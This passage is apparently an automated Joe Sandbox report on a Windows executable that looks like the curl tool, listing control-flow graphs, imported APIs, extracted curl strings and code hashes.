7ff7f8d0c29e-7ff7f8d0c2a3 1022->1026 1027 7ff7f8d0c2ae-7ff7f8d0c2c0 1023->1027 1028 7ff7f8d0c2c6-7ff7f8d0c2d1 1023->1028 1024->1010 1025->1010 1038 7ff7f8d0c1e2-7ff7f8d0c1e9 1025->1038 1026->1022 1026->1023 1027->1028 1030 7ff7f8d0c5c5-7ff7f8d0c5dc free call 7ff7f8d0c63c 1027->1030 1031 7ff7f8d0c2f5-7ff7f8d0c2f7 1028->1031 1030->1014 1043 7ff7f8d0c5de-7ff7f8d0c5e2 1030->1043 1032 7ff7f8d0c2f9-7ff7f8d0c2fb 1031->1032 1033 7ff7f8d0c2d3-7ff7f8d0c2de isspace 1031->1033 1036 7ff7f8d0c2fd-7ff7f8d0c2ff 1032->1036 1037 7ff7f8d0c321-7ff7f8d0c325 1032->1037 1033->1032 1040 7ff7f8d0c2e0-7ff7f8d0c2e4 1033->1040 1041 7ff7f8d0c31e 1036->1041 1044 7ff7f8d0c327-7ff7f8d0c32b 1037->1044 1045 7ff7f8d0c301-7ff7f8d0c30c isspace 1037->1045 1042 7ff7f8d0c1ec-7ff7f8d0c1f2 1038->1042 1046 7ff7f8d0c2f0-7ff7f8d0c2f3 1040->1046 1047 7ff7f8d0c2e6-7ff7f8d0c2e9 1040->1047 1041->1037 1042->1042 1049 7ff7f8d0c1f4-7ff7f8d0c1ff 1042->1049 1043->1017 1050 7ff7f8d0c32d-7ff7f8d0c330 1044->1050 1051 7ff7f8d0c3a5-7ff7f8d0c3a8 1044->1051 1045->1041 1048 7ff7f8d0c30e-7ff7f8d0c312 1045->1048 1046->1031 1047->1032 1052 7ff7f8d0c2eb-7ff7f8d0c2ee 1047->1052 1048->1044 1053 7ff7f8d0c314-7ff7f8d0c317 1048->1053 1049->1010 1054 7ff7f8d0c201-7ff7f8d0c213 call 7ff7f8d0f868 1049->1054 1055 7ff7f8d0c334-7ff7f8d0c33a 1050->1055 1056 7ff7f8d0c3bc-7ff7f8d0c3be 1051->1056 1052->1032 1052->1046 1053->1041 1059 7ff7f8d0c319-7ff7f8d0c31c 1053->1059 1054->1024 1055->1055 1061 7ff7f8d0c33c-7ff7f8d0c34b malloc 1055->1061 1057 7ff7f8d0c3aa-7ff7f8d0c3b5 isspace 1056->1057 1058 7ff7f8d0c3c0-7ff7f8d0c3c2 1056->1058 1057->1058 1062 7ff7f8d0c3b7-7ff7f8d0c3ba 1057->1062 1063 7ff7f8d0c421-7ff7f8d0c42c 1058->1063 1064 7ff7f8d0c3c4-7ff7f8d0c3c6 1058->1064 1059->1041 1059->1044 1065 7ff7f8d0c5e7-7ff7f8d0c5f0 free 1061->1065 1066 7ff7f8d0c351-7ff7f8d0c359 1061->1066 1062->1056 1068 7ff7f8d0c431-7ff7f8d0c454 call 7ff7f8d038d8 1063->1068 1067 7ff7f8d0c3d5-7ff7f8d0c3dc 1064->1067 1065->1014 1069 7ff7f8d0c39a-7ff7f8d0c39c 1066->1069 1070 7ff7f8d0c3c8-7ff7f8d0c3d3 isspace 1067->1070 1071 7ff7f8d0c3de-7ff7f8d0c3e1 1067->1071 1082 7ff7f8d0c475-7ff7f8d0c478 1068->1082 1083 7ff7f8d0c456-7ff7f8d0c459 1068->1083 1073 7ff7f8d0c35b-7ff7f8d0c360 1069->1073 1074 7ff7f8d0c39e-7ff7f8d0c3a0 1069->1074 1070->1067 1070->1071 1075 7ff7f8d0c3f7-7ff7f8d0c41c call 7ff7f8d07774 1071->1075 1076 7ff7f8d0c3e3-7ff7f8d0c3f5 1071->1076 1073->1074 1078 7ff7f8d0c362-7ff7f8d0c365 1073->1078 1074->1068 1075->1063 1076->1063 1076->1075 1079 7ff7f8d0c367-7ff7f8d0c36e 1078->1079 1080 7ff7f8d0c392 1078->1080 1079->1069 1084 7ff7f8d0c370-7ff7f8d0c372 1079->1084 1087 7ff7f8d0c394-7ff7f8d0c397 1080->1087 1085 7ff7f8d0c54e-7ff7f8d0c550 1082->1085 1086 7ff7f8d0c47e-7ff7f8d0c488 1082->1086 1088 7ff7f8d0c45f-7ff7f8d0c462 1083->1088 1089 7ff7f8d0c5b6-7ff7f8d0c5ba 1083->1089 1091 7ff7f8d0c38c 1084->1091 1092 7ff7f8d0c374-7ff7f8d0c376 1084->1092 1085->1089 1095 7ff7f8d0c552-7ff7f8d0c555 1085->1095 1086->1089 1093 7ff7f8d0c48e-7ff7f8d0c492 1086->1093 1087->1069 1088->1089 1090 7ff7f8d0c468-7ff7f8d0c46c 1088->1090 1089->1030 1094 7ff7f8d0c5bc-7ff7f8d0c5bf free 1089->1094 1090->1089 1096 7ff7f8d0c472 1090->1096 1100 7ff7f8d0c38e-7ff7f8d0c390 1091->1100 1097 7ff7f8d0c388-7ff7f8d0c38a 1092->1097 1098 7ff7f8d0c378-7ff7f8d0c37a 1092->1098 1093->1089 1099 7ff7f8d0c498-7ff7f8d0c4b8 malloc 1093->1099 1094->1030 1095->1089 1101 7ff7f8d0c557-7ff7f8d0c564 1095->1101 1096->1082 1097->1100 1102 7ff7f8d0c37c-7ff7f8d0c37e 1098->1102 1103 7ff7f8d0c384-7ff7f8d0c386 1098->1103 1104 7ff7f8d0c4be-7ff7f8d0c53d call 7ff7f8d49b20 1099->1104 1105 7ff7f8d0c53f-7ff7f8d0c549 1099->1105 1100->1087 1106 7ff7f8d0c574-7ff7f8d0c58a 1101->1106 1107 7ff7f8d0c566-7ff7f8d0c572 1101->1107 1102->1100 1108 7ff7f8d0c380-7ff7f8d0c382 1102->1108 1103->1100 1104->1089 1105->1085 1106->1089 1110 7ff7f8d0c58c-7ff7f8d0c5b1 call 7ff7f8d06dbc call 7ff7f8d07774 1106->1110 1107->1106 1108->1100 1110->1089
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspace$free$__acrt_iob_func__swprintf_lfclosefopenmalloc$FileModuleName
                                      • String ID: %s%s$%s%s%s$%s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!$<stdin>$_curlrc
                                      • API String ID: 1811837637-7833359
                                      • Opcode ID: 5a5d829313511d1aecd25e1e472f6a65b41391b9b081f2ac45a1bd6481061ecc
                                      • Instruction ID: a5ecec0b03b949f0d481516b38388c40e4c6c656d4168daa2a19b0cb578860ac
                                      • Opcode Fuzzy Hash: 5a5d829313511d1aecd25e1e472f6a65b41391b9b081f2ac45a1bd6481061ecc
                                      • Instruction Fuzzy Hash: DFF10522A0D68281FB25AB65905427DFB90AF5D7D0F880131DABD077D9DF2CE40DB3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$CriticalSection$CloseEnterHandleLeave
                                      • String ID:
                                      • API String ID: 3321414516-0
                                      • Opcode ID: aad36844fae27e8025c053615da7fb6f5f43d4945fb349eb040299e002739a75
                                      • Instruction ID: 6b362e05df5de9d15198c3e808e76de49e4ad0b75c20442184b63d5645a4807e
                                      • Opcode Fuzzy Hash: aad36844fae27e8025c053615da7fb6f5f43d4945fb349eb040299e002739a75
                                      • Instruction Fuzzy Hash: 5BC19E25709E85D2E718EB31F9502BCE324FF9DB90F880131DA7E477918F2CA4699798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1573 7ff7f8d08037-7ff7f8d08056 call 7ff7f8d0de50 free 1576 7ff7f8d08075-7ff7f8d0808c 1573->1576 1577 7ff7f8d08058-7ff7f8d0b03a call 7ff7f8d07774 1573->1577 1580 7ff7f8d08093-7ff7f8d080ae call 7ff7f8d0239c 1576->1580 1581 7ff7f8d0808e-7ff7f8d08091 1576->1581 1588 7ff7f8d0b03d-7ff7f8d0b03f 1577->1588 1594 7ff7f8d080b4 1580->1594 1595 7ff7f8d0af95 1580->1595 1581->1580 1583 7ff7f8d080b6-7ff7f8d080ba 1581->1583 1586 7ff7f8d080dd-7ff7f8d080f6 fopen 1583->1586 1587 7ff7f8d080bc-7ff7f8d080d9 _stat64 1583->1587 1596 7ff7f8d0811a-7ff7f8d0815d 1586->1596 1597 7ff7f8d080f8-7ff7f8d08115 call 7ff7f8d077b0 1586->1597 1587->1586 1591 7ff7f8d0b041-7ff7f8d0b048 1588->1591 1592 7ff7f8d0b062-7ff7f8d0b081 fclose 1588->1592 1591->1592 1598 7ff7f8d0b04a-7ff7f8d0b05b 1591->1598 1609 7ff7f8d0b0a3-7ff7f8d0b0ac 1592->1609 1610 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1592->1610 1594->1583 1603 7ff7f8d0af9a-7ff7f8d0afa4 1595->1603 1619 7ff7f8d0816a-7ff7f8d0816c 1596->1619 1620 7ff7f8d0815f-7ff7f8d08168 1596->1620 1597->1592 1598->1592 1607 7ff7f8d0b05d _fileno 1598->1607 1603->1588 1608 7ff7f8d0afaa-7ff7f8d0afac 1603->1608 1607->1592 1608->1591 1616 7ff7f8d0afb2-7ff7f8d0afb6 1608->1616 1612 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1609->1612 1613 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1609->1613 1610->1609 1629 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1612->1629 1630 7ff7f8d0b0f4-7ff7f8d0b101 1612->1630 1613->1612 1616->1588 1621 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1616->1621 1625 7ff7f8d0817a 1619->1625 1626 7ff7f8d0816e-7ff7f8d08171 1619->1626 1620->1619 1624 7ff7f8d08173-7ff7f8d08178 1620->1624 1621->1588 1639 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1621->1639 1627 7ff7f8d0817d-7ff7f8d081a2 call 7ff7f8d0b730 1624->1627 1625->1627 1626->1624 1626->1625 1627->1595 1629->1630 1636 7ff7f8d0b117-7ff7f8d0b11b 1630->1636 1637 7ff7f8d0b103-7ff7f8d0b111 1630->1637 1640 7ff7f8d0b213-7ff7f8d0b22a free 1636->1640 1641 7ff7f8d0b121-7ff7f8d0b12f 1636->1641 1637->1636 1637->1640 1639->1588 1646 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1640->1646 1647 7ff7f8d0b234-7ff7f8d0b275 free 1640->1647 1641->1640 1645 7ff7f8d0b135-7ff7f8d0b20d 1641->1645 1645->1640 1652 7ff7f8d07e38-7ff7f8d07ec2 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1645->1652 1646->1647 1661 7ff7f8d0b277 call 7ff7f8d0dbbc 1647->1661 1662 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1647->1662 1652->1603 1661->1662 1664 7ff7f8d0b2bf-7ff7f8d0b2c1 1662->1664 1665 7ff7f8d0b2af-7ff7f8d0b2bd 1662->1665 1667 7ff7f8d0b2c9 1664->1667 1668 7ff7f8d0b2c3-7ff7f8d0b2c7 1664->1668 1665->1664 1666 7ff7f8d0b2db 1665->1666 1667->1666 1668->1666 1668->1667
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_close_fileno_stat64fclosefopenmalloc
                                      • String ID: (%d) Failed writing body$Can't open '%s'!$bad output glob!$9J$@)
                                      • API String ID: 2165304770-1746080394
                                      • Opcode ID: 99d32ef605fa3b9ff88bb0ba5616cb84ea505791f7a657f5b48d51e664de20aa
                                      • Instruction ID: 756210b55e83d1a740cc96c0ab72bf52d981f3e0cef0d09b2747622610dfad26
                                      • Opcode Fuzzy Hash: 99d32ef605fa3b9ff88bb0ba5616cb84ea505791f7a657f5b48d51e664de20aa
                                      • Instruction Fuzzy Hash: 39719222A0EB4285FB50EB61D45457DE365FF88B80FD90435CA7E476D8DE3CE448A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1669 7ff7f8d07ee5-7ff7f8d07eed 1670 7ff7f8d0af9a-7ff7f8d0afa4 1669->1670 1671 7ff7f8d0afaa-7ff7f8d0afac 1670->1671 1672 7ff7f8d0b03d-7ff7f8d0b03f 1670->1672 1673 7ff7f8d0b041-7ff7f8d0b048 1671->1673 1675 7ff7f8d0afb2-7ff7f8d0afb6 1671->1675 1672->1673 1674 7ff7f8d0b062-7ff7f8d0b066 1672->1674 1673->1674 1676 7ff7f8d0b04a-7ff7f8d0b05b 1673->1676 1677 7ff7f8d0b06c-7ff7f8d0b081 fclose 1674->1677 1675->1672 1678 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1675->1678 1676->1674 1683 7ff7f8d0b05d _fileno 1676->1683 1684 7ff7f8d0b0a3-7ff7f8d0b0ac 1677->1684 1685 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1677->1685 1678->1672 1693 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1678->1693 1683->1674 1688 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1684->1688 1689 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1684->1689 1685->1684 1696 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1688->1696 1697 7ff7f8d0b0f4-7ff7f8d0b101 1688->1697 1689->1688 1693->1672 1696->1697 1700 7ff7f8d0b117-7ff7f8d0b11b 1697->1700 1701 7ff7f8d0b103-7ff7f8d0b111 1697->1701 1702 7ff7f8d0b213-7ff7f8d0b22a free 1700->1702 1703 7ff7f8d0b121-7ff7f8d0b12f 1700->1703 1701->1700 1701->1702 1706 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1702->1706 1707 7ff7f8d0b234-7ff7f8d0b275 free 1702->1707 1703->1702 1705 7ff7f8d0b135-7ff7f8d0b20d 1703->1705 1705->1702 1711 7ff7f8d07e38-7ff7f8d07ec2 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1705->1711 1706->1707 1720 7ff7f8d0b277 call 7ff7f8d0dbbc 1707->1720 1721 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1707->1721 1711->1670 1720->1721 1723 7ff7f8d0b2bf-7ff7f8d0b2c1 1721->1723 1724 7ff7f8d0b2af-7ff7f8d0b2bd 1721->1724 1726 7ff7f8d0b2c9 1723->1726 1727 7ff7f8d0b2c3-7ff7f8d0b2c7 1723->1727 1724->1723 1725 7ff7f8d0b2db 1724->1725 1726->1725 1727->1725 1727->1726
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_close_filenofclose
                                      • String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$9J$@)
                                      • API String ID: 1641916826-1623358720
                                      • Opcode ID: 2b274b5f009787d902611c34b5034b512ada662721e6fca31db2dc03b4029cc9
                                      • Instruction ID: b19d9f932479c6684edf4471919656eed5ef690614287eea970d7fdba9004c88
                                      • Opcode Fuzzy Hash: 2b274b5f009787d902611c34b5034b512ada662721e6fca31db2dc03b4029cc9
                                      • Instruction Fuzzy Hash: F0618F22E0EB4285FB20EB61D45457DE765EF88B40FD40035C97E576D8CE3CE448A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ALL$CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!$CURLOPT_WRITEDATA$FLUSH$RELOAD$SESS$Set-Cookie:$identity
                                      • API String ID: 0-1681163804
                                      • Opcode ID: 397c92050f609cb4687807bec7fe33dee7c952afbf463943dd618ed831257fd8
                                      • Instruction ID: 0c2019c2221ccd17c4e85f69bf2c70b16c6718a7a0d4986cf3d1a83d8fb1b769
                                      • Opcode Fuzzy Hash: 397c92050f609cb4687807bec7fe33dee7c952afbf463943dd618ed831257fd8
                                      • Instruction Fuzzy Hash: ABF2EA32A0EE42CAF7696B38D54437CF651EF48760F985036C26E066D4DE3DA40DB7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize_cexit_get_initial_narrow_environment_initterm_e_register_thread_local_exe_atexit_callbackexit
                                      • String ID:
                                      • API String ID: 2533591713-0
                                      • Opcode ID: 7c9171cdf213f1ead3ea1ca360b17c99cef2f0455ee1a27f3977a47252cda938
                                      • Instruction ID: 37b4068fc84ef0ad4a9391a47f1241975808ff3a551ee0a537dd95bfaab33cd2
                                      • Opcode Fuzzy Hash: 7c9171cdf213f1ead3ea1ca360b17c99cef2f0455ee1a27f3977a47252cda938
                                      • Instruction Fuzzy Hash: 36316B21B0C64741FB54BB60A4523B9D290AF4D7C4FD810B5DA3D072D7DE2EA80CA6F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2680 7ff7f8d18220-7ff7f8d1827a call 7ff7f8d187d4 2683 7ff7f8d1853c 2680->2683 2684 7ff7f8d18280-7ff7f8d1829a call 7ff7f8d17b0c 2680->2684 2685 7ff7f8d1853e-7ff7f8d18564 call 7ff7f8d48290 2683->2685 2690 7ff7f8d1829c-7ff7f8d182cc _errno * 2 call 7ff7f8d12c90 call 7ff7f8d167ac 2684->2690 2691 7ff7f8d182d1-7ff7f8d182ee call 7ff7f8d16714 2684->2691 2704 7ff7f8d183ce-7ff7f8d183db call 7ff7f8d1875c 2690->2704 2697 7ff7f8d182f7-7ff7f8d182fb 2691->2697 2698 7ff7f8d182f0-7ff7f8d182f5 2691->2698 2699 7ff7f8d182fd-7ff7f8d18307 2697->2699 2700 7ff7f8d18370 2697->2700 2698->2697 2698->2700 2702 7ff7f8d18309-7ff7f8d18335 setsockopt 2699->2702 2703 7ff7f8d18373-7ff7f8d1837e call 7ff7f8d18170 2699->2703 2700->2703 2705 7ff7f8d18337-7ff7f8d1835b WSAGetLastError call 7ff7f8d12c90 call 7ff7f8d16714 2702->2705 2706 7ff7f8d1835d-7ff7f8d1836e call 7ff7f8d16714 2702->2706 2715 7ff7f8d18380-7ff7f8d18387 2703->2715 2716 7ff7f8d18394-7ff7f8d1839e 2703->2716 2704->2685 2705->2703 2706->2703 2715->2716 2720 7ff7f8d18389-7ff7f8d1838f call 7ff7f8d172b4 2715->2720 2717 7ff7f8d183e0 2716->2717 2718 7ff7f8d183a0-7ff7f8d183be 2716->2718 2723 7ff7f8d183e3-7ff7f8d183ec 2717->2723 2733 7ff7f8d183c0-7ff7f8d183c3 2718->2733 2734 7ff7f8d183c5-7ff7f8d183c7 2718->2734 2720->2716 2725 7ff7f8d183ee-7ff7f8d183f2 2723->2725 2726 7ff7f8d183f4-7ff7f8d18403 call 7ff7f8d17500 2723->2726 2725->2726 2727 7ff7f8d18422-7ff7f8d1845b ioctlsocket call 7ff7f8d23bb8 2725->2727 2726->2727 2732 7ff7f8d18405-7ff7f8d18418 call 7ff7f8d1875c 2726->2732 2738 7ff7f8d1845d-7ff7f8d1846d call 7ff7f8d16208 2727->2738 2739 7ff7f8d18472-7ff7f8d18475 2727->2739 2744 7ff7f8d1841b-7ff7f8d1841d 2732->2744 2733->2723 2734->2717 2737 7ff7f8d183c9 2734->2737 2737->2704 2738->2739 2742 7ff7f8d1847b-7ff7f8d18483 2739->2742 2743 7ff7f8d18534-7ff7f8d18539 2739->2743 2742->2743 2745 7ff7f8d18489-7ff7f8d18490 2742->2745 2743->2683 2744->2685 2746 7ff7f8d184af 2745->2746 2747 7ff7f8d18492-7ff7f8d184ab connect 2745->2747 2750 7ff7f8d184b4-7ff7f8d184ba WSAGetLastError 2746->2750 2748 7ff7f8d184bc-7ff7f8d184cf 2747->2748 2749 7ff7f8d184ad 2747->2749 2751 7ff7f8d1851f-7ff7f8d18521 2748->2751 2752 7ff7f8d184d1-7ff7f8d184d4 2748->2752 2749->2750 2750->2748 2751->2744 2755 7ff7f8d18527-7ff7f8d1852f 2751->2755 2753 7ff7f8d1851d 2752->2753 2754 7ff7f8d184d6-7ff7f8d184df 2752->2754 2753->2751 2754->2753 2756 7ff7f8d184e1-7ff7f8d18518 call 7ff7f8d12c90 call 7ff7f8d16714 call 7ff7f8d1875c 2754->2756 2755->2744 2756->2744
                                      APIs
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1829C
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D182A4
                                        • Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
                                        • Part of subcall function 00007FF7F8D12C90: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
                                        • Part of subcall function 00007FF7F8D12C90: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
                                        • Part of subcall function 00007FF7F8D12C90: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
                                        • Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
                                        • Part of subcall function 00007FF7F8D12C90: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1
                                        • Part of subcall function 00007FF7F8D1875C: closesocket.WS2_32 ref: 00007FF7F8D1879D
                                      • setsockopt.WS2_32 ref: 00007FF7F8D1832D
                                      • WSAGetLastError.WS2_32 ref: 00007FF7F8D18337
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _errno$ErrorLast$__sys_nerrclosesockethtonssetsockoptstrerrorstrncpy
                                      • String ID: Trying %s...$Could not set TCP_NODELAY: %s$Immediate connect fail for %s: %s$TCP_NODELAY set$sa_addr inet_ntop() failed with errno %d: %s
                                      • API String ID: 3129811291-816182543
